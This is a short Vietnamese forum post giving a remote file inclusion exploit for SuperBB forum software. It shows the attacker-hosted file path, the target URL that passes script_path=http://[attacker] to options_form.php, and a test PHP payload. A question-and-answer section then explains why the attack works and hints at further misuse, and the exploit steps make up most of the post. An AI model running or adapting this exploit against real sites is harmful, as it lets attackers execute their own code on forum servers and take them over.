HCE- SuperBB vuln exploit

Khai thác lỗi bảo mật forum SuperBB :

trang này đã được đọc lần

Tạo trên host
http://[attacker]/lang/1/1_options.php

Chạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_code=1
Cách test:
1. Đăng ký một host ko support PHP.
2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1, trong folder 1 tạo một file tên là 1_options.php với nội dung như sau:
CODE

<? echo "Hello world"; ?>

Chạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_code=1

Nếu thấy có dòng chữ "Hello world" thì OK, site đang test bị lỗi này


Câu hỏi:

1. SupperBB vuln là gì?

2. Làm sao đăng kí host trên server đó được ( nếu họ ko cho )

3. Host ko support php thì làm sao hiển thị cái file 1_options.php được?

4. Tại sao lại phải tạo folder lang rồi tạo folder name 1 rồi tạo file 1_options.php , mục đích là để làm gì?

5. Site đang test bị lỗi này thì mình làm được gì với lỗi đó?


Trả lời :

1. Là lỗi bảo mật của forum SuperBB

2. Không cần đăng ký host trên server đó, đăng ký host ở đâu cũng được (nhưng ko được support PHP)

3. Được, vì cái file 1_options.php ko phải được run trên host của mình mà được inject vào code trên host của victim

4. Bởi vì script forum nó include đến file 1_options.php ở trong cấu trúc thư mục như thế

5. Làm được gì là tuỳ vào kinh nghiệm mỗi người